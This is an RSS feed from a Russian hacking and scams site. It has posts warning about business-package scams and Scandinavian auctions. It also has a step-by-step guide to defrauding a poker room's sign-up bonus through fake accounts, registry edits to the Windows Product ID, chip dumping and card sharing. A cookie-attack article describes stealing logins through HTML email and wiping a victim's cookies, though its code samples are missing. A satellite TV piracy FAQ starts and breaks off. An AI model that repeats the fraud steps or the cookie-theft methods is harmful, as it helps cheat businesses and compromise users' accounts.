<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Как разблокировать аккаунт &#187; обман</title>
	<atom:link href="http://suspended.ru/tag/%d0%be%d0%b1%d0%bc%d0%b0%d0%bd/feed/" rel="self" type="application/rss+xml" />
	<link>http://suspended.ru</link>
	<description>Как разблокировать аккаунты, защитить компьютер и стать хакером</description>
	<lastBuildDate>Thu, 23 Dec 2021 13:52:45 +0000</lastBuildDate>
	<language>ru-RU</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.9.27</generator>
	<item>
		<title>Мошенничество, основанное на продаже &#171;Бизнес-пакетов&#187;.</title>
		<link>http://suspended.ru/2010/07/%d0%bc%d0%be%d1%88%d0%b5%d0%bd%d0%bd%d0%b8%d1%87%d0%b5%d1%81%d1%82%d0%b2%d0%be-%d0%be%d1%81%d0%bd%d0%be%d0%b2%d0%b0%d0%bd%d0%bd%d0%be%d0%b5-%d0%bd%d0%b0-%d0%bf%d1%80%d0%be%d0%b4%d0%b0%d0%b6%d0%b5/</link>
		<comments>http://suspended.ru/2010/07/%d0%bc%d0%be%d1%88%d0%b5%d0%bd%d0%bd%d0%b8%d1%87%d0%b5%d1%81%d1%82%d0%b2%d0%be-%d0%be%d1%81%d0%bd%d0%be%d0%b2%d0%b0%d0%bd%d0%bd%d0%be%d0%b5-%d0%bd%d0%b0-%d0%bf%d1%80%d0%be%d0%b4%d0%b0%d0%b6%d0%b5/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 05:05:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Мошенничество в интернете]]></category>
		<category><![CDATA[лохотрон]]></category>
		<category><![CDATA[мошенничество]]></category>
		<category><![CDATA[обман]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=464</guid>
		<description><![CDATA[Если вы хоть немного интересовались темой заработка в сети Интернет, то, безусловно, не раз встречались с предложениями купить за весьма кругленькую (по меркам Интернета) сумму своеобразный &#171;Бизнес-пакет&#187;. Этот волшебный инструмент якобы содержит подробнейшую инструкцию по созданию и развитию успешного бизнеса в сети, который при вашем минимальном участии будет приносить не одну сотню баксов в месяц. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet162.jpg" alt="интернет" />Если вы хоть немного интересовались темой заработка в сети Интернет, то, безусловно, не раз встречались с предложениями купить за весьма кругленькую (по меркам Интернета) сумму своеобразный &#171;Бизнес-пакет&#187;. Этот волшебный инструмент якобы содержит подробнейшую инструкцию по созданию и развитию успешного бизнеса в сети, который при вашем минимальном участии будет приносить не одну сотню баксов в месяц. Здорово, не правда ли? Только все не так просто.<br />
Меня всегда умиляет одна вещь. Зачем продавать какой-то товар в виде бизнеса, приносящий хорошие деньги, если можно зарабатывать на этом самому? Почему вот этот продавец &#171;бизнес-пакетов&#187; сам не получает несколько сотен американских рублей в месяц? Зачем ему надо это продавать за пару десятков долларов? Думаю, ответ вы уже поняли.<span id="more-464"></span> Этот человек &#8212; мошенник. Он проводит достаточно агрессивную рекламу в Интернете, раскручивая до умопомрачения свой сайт. Он пытается впарить свой товар как можно большему количеству людей. Названия этих &#171;Бизнес-пакетов&#187; поражают своей пестротой и шедевральностью &#8212; мегаматричный бизнес, Финансовая Кибер-свобода и т.д. Кроме того, вас ожидают еще и бонусы! Вау, Супер! Вам снятся дальние страны, солнечные пляжи, белоснежные яхты… Как жаль, что вы не знали об этом раньше. Рядом можно прочесть отзывы довольных клиентов, пожинающих плоды финансовой кибер-ультра-мега-независимости.<br />
Пестрые фотографии, восторженные слова о легкости и доходности, предлагаемого вам бизнеса. Осталось сделать последний шаг &#8212; КУПИТЬ столь вожделенную вещь. И вот свершилось &#8212; вы обладатель уникального &#171;Бизнес-пакета&#187;. Вам повезет, если там хоть что-нибудь окажется. Как максимум вы получите подробные инструкции, как сделать подобный сайт и продавать …. Угадайте что? Правильно &#8212; &#171;Бизнес-пакеты&#187;. Дело то это прибыльное :)). Вот таким образом и обманывают нашего брата. Будьте бдительны.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/07/%d0%bc%d0%be%d1%88%d0%b5%d0%bd%d0%bd%d0%b8%d1%87%d0%b5%d1%81%d1%82%d0%b2%d0%be-%d0%be%d1%81%d0%bd%d0%be%d0%b2%d0%b0%d0%bd%d0%bd%d0%be%d0%b5-%d0%bd%d0%b0-%d0%bf%d1%80%d0%be%d0%b4%d0%b0%d0%b6%d0%b5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Скандинавский аукцион.</title>
		<link>http://suspended.ru/2010/07/%d1%81%d0%ba%d0%b0%d0%bd%d0%b4%d0%b8%d0%bd%d0%b0%d0%b2%d1%81%d0%ba%d0%b8%d0%b9-%d0%b0%d1%83%d0%ba%d1%86%d0%b8%d0%be%d0%bd/</link>
		<comments>http://suspended.ru/2010/07/%d1%81%d0%ba%d0%b0%d0%bd%d0%b4%d0%b8%d0%bd%d0%b0%d0%b2%d1%81%d0%ba%d0%b8%d0%b9-%d0%b0%d1%83%d0%ba%d1%86%d0%b8%d0%be%d0%bd/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 05:04:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Мошенничество в интернете]]></category>
		<category><![CDATA[лохотрон]]></category>
		<category><![CDATA[мошенничество]]></category>
		<category><![CDATA[обман]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=443</guid>
		<description><![CDATA[Сначала для тех, кто не в курсе, немного о том, что такое скандинавский аукцион. Я думаю, об обычных аукционах слышали все, на них продают все, что душе угодно и не угодно. Выставляют лот и заинтересованные покупатели начинают торговаться, постепенно повышая ставку лота. В итоге лот достается тому, кто назначил за него максимальную цену. В скандинавском [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet149.jpg" alt="интернет" />Сначала для тех, кто не в курсе, немного о том, что такое скандинавский аукцион. Я думаю, об обычных аукционах слышали все, на них продают все, что душе угодно и не угодно. Выставляют лот и заинтересованные покупатели начинают торговаться, постепенно повышая ставку лота. В итоге лот достается тому, кто назначил за него максимальную цену.<br />
В скандинавском аукционе, в общем то, все тоже самое, только с небольшими так сказать &#171;доработками&#187;. А именно на торги выставляются лоты за смешную цену, шаг повышения цены всегда фиксирован, и каждое повышение цены обходится участнику аукциона в некоторую сумму. Время проведения аукциона в большинстве случаев ограничено, хотя на некоторых аукционах продлевается на автомате.<span id="more-443"></span> Если кто-то делает ставку, то время проведения аукциона продлевается на полминуты. Лот достается тому, кто сделал последнюю ставку.<br />
Для лучшего понимания как это работает, рассмотрим пример. На торги выставляется видеокамера, стартовая цена лота 1 рубль. Шаг аукциона 10 рублей, стоимость одной ставки 10 рублей. Понятно, что каждый хочет владеть видеокамерой за такие смешные деньги. Поэтому участники начинают делать (считай покупать) ставки.<br />
Сделал ставку первый участник, заплатив за это 10 рублей, и видео камера стала стоить 11 рублей. Сделал ставку второй, цена камеры поднялась до 21 рубля, сделал третий &#8212; цена стала 31 рубль. В итоге, предположим, всего было сделано 500 ставок, на этом время проведения аукциона истекло. Выигравший получил видеокамеру за 5001 рубль плюс те деньги, которые он потратил, делая ставки.<br />
В общем то неплохо, если предположить, что рыночная цена такой камеры, например, составляет 8000 рублей. В этом случае, покупатель сэкономил 3000 рублей минус деньги потраченные на ставки, а сервис, организовавший аукцион, тоже в накладе не остался. Прибыль сервиса составила 5001 (цена камеры) + 5000 (цена за проданные ставки) &#8212; 8000 себестоимость камеры. Итого 2001 рубль.<br />
Со стороны скандинавский аукцион больше напоминает лотерею или азартную игру, но у меня всегда в этих случаях встает вопрос: А где гарантии? Гарантии того, что организаторы скандинавского аукциона ведут себя честно.<br />
По-моему, еще не так давно были времена, когда на улицах любого города России можно было встретить лохотронщиков. Эти умники тоже организовывали что-то типа лотереи, в которой почему-то всегда оказывалось два победителя, один из которых был подставным лицом.<br />
Далее в ходе торгов за приз очень быстро доверчивый гражданин оставался без денег, еще бы, ведь подставной участник не ставил свои деньги, ему их просто незаметно передавали, так сказать, устраивали небольшой круговорот финансовых средств. Да что я вам рассказываю, вы наверное и без меня прекрасно знаете схему такого лохотрона.<br />
И в случае со скандинавским аукционом ситуация точно такая же. Его организаторы под вымышленным ником могут спокойно принимать участие в аукционе, они его владельцы, и могут спокойно нарисовать на счету любого аккаунта какую угодно сумму. Такая ситуация возможна на любом скандинавском аукционе. Я не говорю, что она происходит всегда и на всех подобных аукционах, потому что сам лично я эту информацию не проверял, да и если честно проверять не собираюсь. Зачем рисковать собственными деньгами. Я лишь говорю здесь о возможном мошенничестве со стороны организаторов скандинавских аукционов.<br />
Но вопрос то все-таки остается? Где гарантии, что скандинавский аукцион &#8212; это не лохотрон. Ради интереса я ввел в поисковую строку Яндекса запрос &#171;скандинавский аукцион&#187; и попытался проанализировать выдачу.<br />
Что я обнаружил, а точнее не обнаружил. На какой сайт не зайди в контактных данных только e-mail, у некоторых нет даже мыла, можно отправить только сообщение с сайта. Ни адресов, ни телефонов, ни реквизитов компании, которой принадлежит этот web-ресурс, одни улыбающиеся лица победителей прошлых аукционов, вымышленные или нет, сам черт не поймет.<br />
А если всего этого нет, как я могу быть уверен, что меня не обманут. Ответ однозначен никак. И более того, по моему мнению, скандинавский аукцион &#8212; по всем признаком подпадает под категорию азартных игр. А раз так помимо солидности компании, у нее еще должна быть соответствующая лицензия на право вести игорный бизнес.<br />
Я не буду с ходу поливать все скандинавские аукционы грязью и кричать, что кругом одни мошенники. В конце концов такие выводы может делать только суд на основании определенных фактов. А факты в каждом конкретном случае разные.<br />
Вот пару дней назад на одном сайте увидел такое объявление.<br />
Скандинавский аукцион &#8212; это вид аукциона,<br />
при котором товар или услуга выставляется<br />
на продажу по минимальной стоимости.<br />
Разберем все на примере:<br />
На торги выставляется Смартфон Apple iPhone 3G 16Gb рыночной стоимостью 27000 рублей. Начальная стоимость &#8212; 1 рубль. Шаг аукциона &#8212; 25 копеек. Плата за ставку &#8212; 7 рублей. Всего в ходе торгов было сделано 1526 ставок, из них наш участник Вася сделал 10 ставок, и восьмая оказалась последней.<br />
К этому времени аукционная цена достигла 382.5 руб. (1 руб. + 1526 ставок * 25 коп.). Вася получит телефон за 452.5 руб. (из них, 382.5 руб. &#8212; аукционная цена, 70 рублей Вася потратил на 10 ставок по 7 рублей каждая). Итого, Вася сэкономил 26547.5 руб. Удачная покупка!<br />
На нашем аукционе выставляются исключительно новые лоты. Например, смартфоны, фотоаппараты, сотовые телефоны, игровые приставки, ноутбуки, подарочные карты, микроволновые печи, mp3-плееры, телевизоры и т.д.<br />
Эти товары никогда не будут лишними.<br />
Действительно покупка удачная, в том случае если этот мифический Вася реально существует. Объясню, почему мне так кажется. Давайте просто подсчитаем, только не с точки зрения Васи, а с точки зрения хозяина аукциона. Значит всего сделано 1526 ставок ценой в 7 рублей каждая. Итого аукцион получил 10682 рубля плюс собственно 382,5 рубля за смартфон. Итого получается чуть больше 11000 рублей. А рыночная цена смартфона составляет 27 000 рублей. Итого чистый убыток аукциона составил 16000 рублей.<br />
Вопрос! Они что деньги зарабатывают? Или занимаются благотворительностью? Вообще в благотворительность скандинавского аукциона верится с трудом, в таком случае как они зарабатывают деньги при такой торговле. Может быть на контексной рекламе или банерной рекламе? Тоже нет. Ни один нормальный проект не станет рекламироваться на сайте, где тусуется толпа халявщиков.<br />
Вопрос так и остается без ответа, хотя нехорошие подозрения появляются.<br />
Что же мы получаем в итоге? А в итоге получается следующая ситуация. Честность игры на скандинавском аукционе целиком и полностью зависит от честности его устроителей. Для меня таких гарантий явно недостаточно, не верю я в человеческую честность. Так что пока я не увижу, что аукцион принадлежит солидной компании, пока на сайте не будет выложена хотя бы лицензия, дающая право заниматься игорным бизнесом, я скандинавский аукцион буду обходить стороной, что и вам советую</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/07/%d1%81%d0%ba%d0%b0%d0%bd%d0%b4%d0%b8%d0%bd%d0%b0%d0%b2%d1%81%d0%ba%d0%b8%d0%b9-%d0%b0%d1%83%d0%ba%d1%86%d0%b8%d0%be%d0%bd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Как развести покер-рум</title>
		<link>http://suspended.ru/2010/07/%d0%ba%d0%b0%d0%ba-%d1%80%d0%b0%d0%b7%d0%b2%d0%b5%d1%81%d1%82%d0%b8-%d0%bf%d0%be%d0%ba%d0%b5%d1%80-%d1%80%d1%83%d0%bc/</link>
		<comments>http://suspended.ru/2010/07/%d0%ba%d0%b0%d0%ba-%d1%80%d0%b0%d0%b7%d0%b2%d0%b5%d1%81%d1%82%d0%b8-%d0%bf%d0%be%d0%ba%d0%b5%d1%80-%d1%80%d1%83%d0%bc/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 05:04:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Мошенничество в интернете]]></category>
		<category><![CDATA[лохотрон]]></category>
		<category><![CDATA[мошенничество]]></category>
		<category><![CDATA[обман]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=431</guid>
		<description><![CDATA[Статья написана для людей любого рода деятельности, но которые хотят заработать в интернете, невзирая на мошенничество (статьи писать не умею, так что если изложил не доходчиво, то нагами не пинайте, старался как мог, статья первая ) Здрасте. Я знаю способ как можно зарабатывать примерно 50$ и более в день (в зависимости от вашего труда) Скажу [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet131.jpg" alt="интернет" />Статья написана для людей любого рода деятельности, но которые хотят заработать в интернете, невзирая на мошенничество <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
(статьи писать не умею, так что если изложил не доходчиво, то нагами не пинайте, старался как мог, статья первая <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  )<br />
Здрасте.<br />
Я знаю способ как можно зарабатывать примерно 50$ и более в день<br />
(в зависимости от вашего труда) <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
Скажу сразу что этот способ, является мошенничеством, но несмотря на это будем наказывать буржуев <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
Даже если вас запалят, что вы играете не честно, то вам ничего не будет! Максимум заблокируют акк.<br />
Начнём.<br />
Мой друг часто играет в онлайн-покер и знает кто и сколько даёт бездепозитных бонусов.<span id="more-431"></span><br />
Он наткнулся на замечательный онлайн-покер рум WolfWhitePoker, он предоставляет новым игрокам бонус в<br />
размере 5$ сразу! Я уже не помню как и прикаких обстоятельствах мы начали изучать данный покер-рум, мы<br />
ковырялись несколько дней и наш труд себя оправдал.<br />
Подробнее о покер-руме.<br />
При регистрации (по специальной ссылке) вам сразу начисляют 5 уе. Но естественно нам было интересно по чём<br />
именно идёт привязка, т.к. если создать 1 акк, то на второй уже бонус не приходит!<br />
При детальном изучении мы выяснили, что привязка идёт по ip (ну это естественно) и id винды. Т.к. ip у нас динамический, то 1 момент мы уже сразу откинули (если у вас ip статический, то юзайте прокси).<br />
При создании каждого нового акка вы должны менять ip и id винды!!!<br />
Шаг 1.<br />
Регимся, по спец ссылке (сейчас она</p>
<p>https://www.whitewolfpoker.com/ru.get-started.sign-up?bonus=pokerfree5)</p>
<p>Шаг 2.<br />
сливаем деньги своему другу <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  Хоче предупредить что не так всё просто, т.к. при слитии лучше играть не 1<br />
на 1 (ты и друг), а играть и с другими игроками, т.к. при выплате денег, они просматривают статистику<br />
игрока, с кем он играл и т.д.<br />
Шаг 3.<br />
Когда деньги слили другу, то друг пусть играет (работает на статы), а вы тем временем меняйте ip и id винды. IP меняется прокси (если не динамический), а id винды меняется пуск > выполнить > пишем regedit > находим HKEY_LOcAL_MACHINE > SOFTWARE > MICROSOFT > CURENT VERSION > Product ID (вот тут и меняйте)<br />
Заметки.<br />
1. Ваш друг должен создать только 1 акк (на который и будут сливаться деньги) и под своими реальными данными, т.к. при выводе денег они проверяют.<br />
2. Ваш друг должен играть не только с вами, но и другими игроками, т.к. при выводе денег просматривается статистика игрока.<br />
3. Играйте на безлимитке, т.к. быстрее сливаются деньги, НО НЕ СТАВЬТЕ СРАЗУ ВСЕ ДЕНЬГИ!!! т.к. могут заподозрить в нечестной игре (курочка по зёрнышку клюёт), продумайте способ кто сколько кому будет сливать.<br />
4. Говорите друг другу свои карты. (Желательно общаться по скайпу, чтобы долго не писать)<br />
5. Данный покер-рум ещё молодой и активно следит за играми игроков.<br />
6. При выводе денег у вас могут попросить скан вашего паспорта.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/07/%d0%ba%d0%b0%d0%ba-%d1%80%d0%b0%d0%b7%d0%b2%d0%b5%d1%81%d1%82%d0%b8-%d0%bf%d0%be%d0%ba%d0%b5%d1%80-%d1%80%d1%83%d0%bc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Взлом через cookie</title>
		<link>http://suspended.ru/2010/07/%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-cookie/</link>
		<comments>http://suspended.ru/2010/07/%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-cookie/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 05:04:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=416</guid>
		<description><![CDATA[конецформыначалоформыЗачем Cookie нужен? Дело в том, что HTTP-протокол &#8212; одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet116.jpg" alt="интернет" />конецформыначалоформыЗачем Cookie нужен? Дело в том, что HTTP-протокол &#8212; одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от странички к страничке, и даже от сессии к сессии, она хранится у него на диске. К удобству можно отнести еще и то, что эту информацию пользователь всегда сможет сменить у себя на диске &#171;на лету&#187;. В Cookie также могут храниться другие разнообразные данные. Например, количество посещений какой-то страницы, время посещений. С помощью cookie не составляет труда сделать маленький органайзер или корзину в виртуальном магазине.<span id="more-416"></span><br />
Cookie многие не любят из-за ее небезопасности. Многие аналитики говорят, что это не проблема, и ничего плохого с помощью данной технологии сделать нельзя. Я с этим глубоко не согласен, если кто-то может читать информацию из файла(ов) cookie, то это уже небезопасно. Приведу чисто теоретические примеры, которые, при желании, не трудно воплотить в реальность.<br />
1. Допустим, пользователь зашел на почтовый сайт, заполнил форму с login&#8217;ом и паролем, которые записались в cookie, пускай даже через Secure Socket Level. Взломщик написал письмо пользователю в формате HTML с параметрами чтения cookie с паролями. Прочитав cookie, HTML-файл или запрашивает у пользователя разрешение отослать информацию взломщику, где пользователя можно обмануть ложной надписью а ля &#171;Ошибки в сценариях Javascript!&#187;. Даже довольно опытный пользователь не задумываясь нажмет OK, после чего login и пароль отошлется взломщику. Или взломщик может добавить 0-ой фрейм, где будет временно содержаться информация из cookie, которая при ответе на письмо, будет вставляться в конец письма. Все это нетрудно сделать с помощью FORM и Javascript.<br />
2. Пример с виртуальным магазином. Допустим, мы имеем гипотетический магазин shop.provider.com. Совершая покупки в данном магазине, пользователь хранит информацию в cookie. Параллельно или до захода в магазин, пользователь зашел на гипотетическую страницу взломщика hacker.provider.com, где изменялись настройки cookie виртуального магазина. Взломщик может изменить количество покупок, имя, адрес, и все то, что хранится в данном cookie. Я думаю, вам бы не понравилось, если к вашим покупкам прибавили пару мониторов или отвезли ваши покупки не тому пользователю. Сделать это довольно просто, если иметь страничку в домене магазина второго или третьего уровня. Несколько других, уже ПРАКТИЧЕСКИХ примеров.<br />
Итак, для пользователя технология cookie представляет собой несколько файлов в папке %WINDOWS%\Cookies (по умолчанию в Internet Explorer), либо всего один файл cookie.txt (если это Netscape Navigator и другие броузеры). Сайты периодически добавляют информацию в cookie и ее же забирают. Естественно, в спецификациях Cookie предусмотрены некоторые элементы защиты.<br />
Всего Cookies может быть не больше 300.<br />
Каждый Cookie не может быть больше 4kb.<br />
С одного домена второго уровня (плюс подуровни) не может быть получено больше 20 Cookies.<br />
Информация из Cookie одного домена второго уровня (плюс подуровни) не может быть прочитана другими доменами.<br />
Если документ кэшируется, то информация о cookie не кэшируется.<br />
Информация в\из Cookie может передавать с помощью протокола SSL. Если лимит исчерпывается, первые записи удаляются. Если Cookie становится больше 4kb, первые байты вырезаются.<br />
Формат Cookie. Полную спецификацию на английском можно найти на http://www.netscape.com/newsref/std/cookie_spec.html. В моей статье только сокращенное описание. Информация в Cookie задается принципом ИМЯ=ЗНАЧЕНИЕ. В одном документе может содержаться несколько Cookies (не больше 20). Минимальное описание поля Cookie выглядит так:<br />
Set-Cookie: NAME=VALUE; Максимальное выглядит так: Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure<br />
NAME=VALUE &#8212; NAME &#8212; Имя Cookie, VALUE &#8212; Значение. Можно менять как NAME, так и VALUE. Используются любые символы, кроме символа переноса строки, двоеточия, запятой и пробела. Пример: Имя=Вася<br />
expires=DATE &#8212; Дата окончания действия Cookie. Менять только DATE. Вид такой: &#171;expires=День, Число-Ден-ГГГГ ЧЧ:ММ:СС GMT&#187;. Если expires не обозначен, Cookie хранится до закрытия окна броузера. Пример: expires=Fri, 14-Sep-2005 13:13:13 GMT<br />
domain=DOMAIN_NAME &#8212; домен на котором действителен Cookie. Вид такой: &#171;domain=domain.com&#187;. Cookie будет действителен как для www.domain.com, так и для myname.domain.com. В зоне RU и других локальных зонах не работает. Используется только для COM, EDU, NET, ORG, GOV, MIL и INT. Если domain не обозначен, используется доменное имя сервера с Cookie. Пример1: domain=mamapapa.com Пример2: domain=gazzzeta.da.ru<br />
path=PATH &#8212; Указывает имена докментов, для которых действительно значение Cookie. Вид такой: &#171;path=/word&#187;. Cookie будет отсылаться в директориях /word, /word2000 и файлов в текущей директории с именами word.htm, wordchampion.html. Для применения Cookie ко всему серверу указывается корневой каталог сервера /. Если path не указан, Cookie распространяется только на текущую директорию. Пример1: path=/gazzzeta Пример2: path=/<br />
secure &#8212; Если указан, при передаче Cookie используется HTTPS (HTTP с SSL &#8212; Secure Socket Level). Если secure не указан, Cookie передается HTTP.<br />
Если Cookie использует одинаковое значение NAME, domain и path &#8212; старое значение заменяется новым.<br />
Вставка Cookie в HTML. Вставить Cookie можно несколькими способами. Самые простой &#8212; это через META-тег. Альтернативным способом является Javascript и всевозможные другие технологии (CGI, PHP, SSI и т.д.). Рассматривать CGI, PHP, SSI и прочие мы не будем, т.к. это требует от вашего домена, где располагается страница, возможности использования этих технологий, что бывает не всегда.<br />
Использование Cookie через META-тег. Между тегов и Cookie вписывается так: Можно использовать несколь META-тегов с Cookie в одном документе. Пример:<br />
Использование Cookie через Javascript. Использование Cookie с помощью Javascript является самым популярным способом, т.к. это довольно просто для разработчика, не требует от сервера определенного программного обеспечения и может использовать динамичные данные, генерируемые внутренним Javasript-скриптом, либо вводимые пользователем. Вот примера скрипта Javascript, используещего Cookie. Скрипт не мой, но он точно описывает те возможности, о которых мы говорим. К сожалению, автора скрипта я не знаю поэтому указать не могу.<br />
Останавливаться на данном скрипте смысла нет, статья о Cookie, а не о Javascript.<br />
Как видите, технология Cookie предоставляет огромные возможности для разработчиков сайтов. Cookie поддерживается всеми более или менее известными броузерами, такими как Netscape Navigator, Microsoft Internet Explorer, Mosaic, Opera и другими, начиная с самых первых версий.<br />
Взлом через Cookie<br />
А зачем мне все это надо? Технология cookie используется при заполнении полей, хранения информации, для виртуальных корзин в Интернет-магазинах, в баннерных сетях и много чего еще. Но также эта технология используется взломщиками для достижения своих целей. 1. Радость от гадости. Первый пример основан на том, что по спецификациям, броузер может хранить не больше 20 записей от одного домена. При переполнении данного лимита, старые записи затираются новыми.<br />
Использование: Закачать HTML-файл на тот сервер, откуда пришли cookie. Можно послать по E-mail, если жертва читает почту через Web, все cookie от его почтового сервера сотрутся. Если нужно удалить все cookies с *.домен.com, заменять строчки примера на Работает только с доменами COM, EDU, NET, ORG, GOV, MIL, INT. Сам пример файла:<br />
&#8230;<br />
Сохраняй этот файл как cook.htm, он нам еще пригодится.<br />
2. Полная гадость. Вторая гадость основана на том, что общее количество cookies может быть не больше 300. При переполнении лимита, старые записи также затираются новыми. Уловил мысль? Затираем все cookies жертвы. Сначала тебе придется завести 15 аккаунтов для страничек на разных серверах. Заходим на всякие narod.ru, заводим аккаунты cook.site1.ru, cook.site2.ru и т.д. до cook.site15.ru. Затем заливаем на каждую страничку файл cook.htm, который мы использовали в прошлой гадости. На все это у тебя должно уйти не больше часа при нормальной раскладке пальцев \m/. Создаем файлик index.html и вписываем туда следующее:<br />
Заливаем созданный файл в любое место, например на cook.narod.ru. Зайдя на этот сайт, у пользователя будет вычищаться весь cookies, накопленный годами, за пару секунд.<br />
3. Почему нельзя забить дисковое пространство или сделать buffer overflow? Дело в том, что каждый cookie не может быть больше 4kb. Если лимит превышен, начало cookie удаляется. Максимум, что можно сделать &#8212; забить жертве 1,2mb дискового пространства при хорошем качестве связи у жертвы, либо disconnect&#8217;ить жертву при плохой связи. Для этого меняй строчки в cook.htm на следующее:<br />
Защита. Способов защиты несколько и каждый способ довольно неудобен.<br />
1. Отменить использование cookie в броузере. Недостаток в том, что пользователь фактически отказывается ходить на огромное количество сайтов.<br />
2. Завести программу из класса Cookie Manager. Недостаток в том, что надо постоянно держать лишнюю программу. А это для интернетчика с включенным Firewall&#8217;ом, антивирусным монитором, ICQ, Dialer&#8217;ом и т.д. довольно большое неудобство.<br />
3. Не вступать в случайные связи. Недостаток в том, что твои &#171;проверенные&#187; друзья тоже могут над тобой подшутить, да и не вступать в случайные связи &#8212; значит сидеть дома и наслаждаться сайтами по адресу 127.0.0.1.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/07/%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-cookie/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>НТВ+ бесплатно</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-258/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-258/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=566</guid>
		<description><![CDATA[Как смотреть НТВ+ и другие каналы Как смотреть НТВ+ и другие каналы, кодированные в системе Nagravision-Syster, если нет возможности смотреть их официально?Ответы на наиболее часто задаваемые вопросы на основе собственных наработок. Этот FAQ предназначен для тех, кто увлекается спутниковым телевидением, компьютерами, кто любит экспериментировать, не боится неудач. Внимание! Информация только для образовательных целей. Коммерческое использование [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet265.jpg" alt="интернет" />Как смотреть НТВ+ и другие каналы<br />
Как смотреть НТВ+ и другие каналы, кодированные в системе Nagravision-Syster, если нет возможности смотреть их официально?Ответы на наиболее часто задаваемые вопросы на основе собственных наработок.<br />
Этот FAQ предназначен для тех, кто увлекается спутниковым телевидением, компьютерами, кто любит экспериментировать, не боится неудач.<br />
